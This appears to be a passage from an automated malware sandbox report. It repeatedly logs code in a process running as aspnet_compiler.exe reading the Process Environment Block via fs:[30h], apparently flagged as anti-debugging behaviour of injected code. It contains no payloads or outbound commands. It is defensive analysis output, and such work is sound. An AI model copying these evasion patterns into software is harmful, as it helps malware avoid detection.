            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA5D0 mov eax, dword ptr fs:[00000030h]3_2_01AEA5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]3_2_01ADE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]3_2_01ADE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]3_2_01ADE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]3_2_01ADE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]3_2_01ADE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]3_2_01AC0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]3_2_01AC0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]3_2_01AC0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]3_2_01AC0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]3_2_01AC0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]3_2_01AC0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B46500 mov eax, dword ptr fs:[00000030h]3_2_01B46500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE656A mov eax, dword ptr fs:[00000030h]3_2_01AE656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE656A mov eax, dword ptr fs:[00000030h]3_2_01AE656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE656A mov eax, dword ptr fs:[00000030h]3_2_01AE656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB8550 mov eax, dword ptr fs:[00000030h]3_2_01AB8550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB8550 mov eax, dword ptr fs:[00000030h]3_2_01AB8550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB64AB mov eax, dword ptr fs:[00000030h]3_2_01AB64AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3A4B0 mov eax, dword ptr fs:[00000030h]3_2_01B3A4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE44B0 mov ecx, dword ptr fs:[00000030h]3_2_01AE44B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B6A49A mov eax, dword ptr fs:[00000030h]3_2_01B6A49A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB04E5 mov ecx, dword ptr fs:[00000030h]3_2_01AB04E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAE420 mov eax, dword ptr fs:[00000030h]3_2_01AAE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAE420 mov eax, dword ptr fs:[00000030h]3_2_01AAE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAE420 mov eax, dword ptr fs:[00000030h]3_2_01AAE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAC427 mov eax, dword ptr fs:[00000030h]3_2_01AAC427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA430 mov eax, dword ptr fs:[00000030h]3_2_01AEA430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE8402 mov eax, dword ptr fs:[00000030h]3_2_01AE8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE8402 mov eax, dword ptr fs:[00000030h]3_2_01AE8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE8402 mov eax, dword ptr fs:[00000030h]3_2_01AE8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3C460 mov ecx, dword ptr fs:[00000030h]3_2_01B3C460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADA470 mov eax, dword ptr fs:[00000030h]3_2_01ADA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADA470 mov eax, dword ptr fs:[00000030h]3_2_01ADA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADA470 mov eax, dword ptr fs:[00000030h]3_2_01ADA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B6A456 mov eax, dword ptr fs:[00000030h]3_2_01B6A456
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA645D mov eax, dword ptr fs:[00000030h]3_2_01AA645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD245A mov eax, dword ptr fs:[00000030h]3_2_01AD245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB07AF mov eax, dword ptr fs:[00000030h]3_2_01AB07AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B647A0 mov eax, dword ptr fs:[00000030h]3_2_01B647A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5678E mov eax, dword ptr fs:[00000030h]3_2_01B5678E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD27ED mov eax, dword ptr fs:[00000030h]3_2_01AD27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD27ED mov eax, dword ptr fs:[00000030h]3_2_01AD27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD27ED mov eax, dword ptr fs:[00000030h]3_2_01AD27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB47FB mov eax, dword ptr fs:[00000030h]3_2_01AB47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB47FB mov eax, dword ptr fs:[00000030h]3_2_01AB47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3E7E1 mov eax, dword ptr fs:[00000030h]3_2_01B3E7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABC7C0 mov eax, dword ptr fs:[00000030h]3_2_01ABC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B307C3 mov eax, dword ptr fs:[00000030h]3_2_01B307C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2C730 mov eax, dword ptr fs:[00000030h]3_2_01B2C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEC720 mov eax, dword ptr fs:[00000030h]3_2_01AEC720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEC720 mov eax, dword ptr fs:[00000030h]3_2_01AEC720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE273C mov eax, dword ptr fs:[00000030h]3_2_01AE273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE273C mov ecx, dword ptr fs:[00000030h]3_2_01AE273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE273C mov eax, dword ptr fs:[00000030h]3_2_01AE273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEC700 mov eax, dword ptr fs:[00000030h]3_2_01AEC700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB0710 mov eax, dword ptr fs:[00000030h]3_2_01AB0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE0710 mov eax, dword ptr fs:[00000030h]3_2_01AE0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB8770 mov eax, dword ptr fs:[00000030h]3_2_01AB8770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE674D mov esi, dword ptr fs:[00000030h]3_2_01AE674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE674D mov eax, dword ptr fs:[00000030h]3_2_01AE674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE674D mov eax, dword ptr fs:[00000030h]3_2_01AE674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B34755 mov eax, dword ptr fs:[00000030h]3_2_01B34755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3E75D mov eax, dword ptr fs:[00000030h]3_2_01B3E75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB0750 mov eax, dword ptr fs:[00000030h]3_2_01AB0750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2750 mov eax, dword ptr fs:[00000030h]3_2_01AF2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2750 mov eax, dword ptr fs:[00000030h]3_2_01AF2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEC6A6 mov eax, dword ptr fs:[00000030h]3_2_01AEC6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE66B0 mov eax, dword ptr fs:[00000030h]3_2_01AE66B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB4690 mov eax, dword ptr fs:[00000030h]3_2_01AB4690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB4690 mov eax, dword ptr fs:[00000030h]3_2_01AB4690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B2E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B2E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B2E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B2E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B306F1 mov eax, dword ptr fs:[00000030h]3_2_01B306F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B306F1 mov eax, dword ptr fs:[00000030h]3_2_01B306F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA6C7 mov ebx, dword ptr fs:[00000030h]3_2_01AEA6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA6C7 mov eax, dword ptr fs:[00000030h]3_2_01AEA6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB262C mov eax, dword ptr fs:[00000030h]3_2_01AB262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE627 mov eax, dword ptr fs:[00000030h]3_2_01ACE627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE6620 mov eax, dword ptr fs:[00000030h]3_2_01AE6620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE8620 mov eax, dword ptr fs:[00000030h]3_2_01AE8620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2619 mov eax, dword ptr fs:[00000030h]3_2_01AF2619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E609 mov eax, dword ptr fs:[00000030h]3_2_01B2E609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA660 mov eax, dword ptr fs:[00000030h]3_2_01AEA660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA660 mov eax, dword ptr fs:[00000030h]3_2_01AEA660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7866E mov eax, dword ptr fs:[00000030h]3_2_01B7866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7866E mov eax, dword ptr fs:[00000030h]3_2_01B7866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE2674 mov eax, dword ptr fs:[00000030h]3_2_01AE2674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACC640 mov eax, dword ptr fs:[00000030h]3_2_01ACC640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B389B3 mov esi, dword ptr fs:[00000030h]3_2_01B389B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B389B3 mov eax, dword ptr fs:[00000030h]3_2_01B389B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B389B3 mov eax, dword ptr fs:[00000030h]3_2_01B389B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB09AD mov eax, dword ptr fs:[00000030h]3_2_01AB09AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB09AD mov eax, dword ptr fs:[00000030h]3_2_01AB09AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3E9E0 mov eax, dword ptr fs:[00000030h]3_2_01B3E9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE29F9 mov eax, dword ptr fs:[00000030h]3_2_01AE29F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE29F9 mov eax, dword ptr fs:[00000030h]3_2_01AE29F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7A9D3 mov eax, dword ptr fs:[00000030h]3_2_01B7A9D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B469C0 mov eax, dword ptr fs:[00000030h]3_2_01B469C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE49D0 mov eax, dword ptr fs:[00000030h]3_2_01AE49D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3892A mov eax, dword ptr fs:[00000030h]3_2_01B3892A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B4892B mov eax, dword ptr fs:[00000030h]3_2_01B4892B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3C912 mov eax, dword ptr fs:[00000030h]3_2_01B3C912
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA8918 mov eax, dword ptr fs:[00000030h]3_2_01AA8918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA8918 mov eax, dword ptr fs:[00000030h]3_2_01AA8918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E908 mov eax, dword ptr fs:[00000030h]3_2_01B2E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E908 mov eax, dword ptr fs:[00000030h]3_2_01B2E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF096E mov eax, dword ptr fs:[00000030h]3_2_01AF096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF096E mov edx, dword ptr fs:[00000030h]3_2_01AF096E
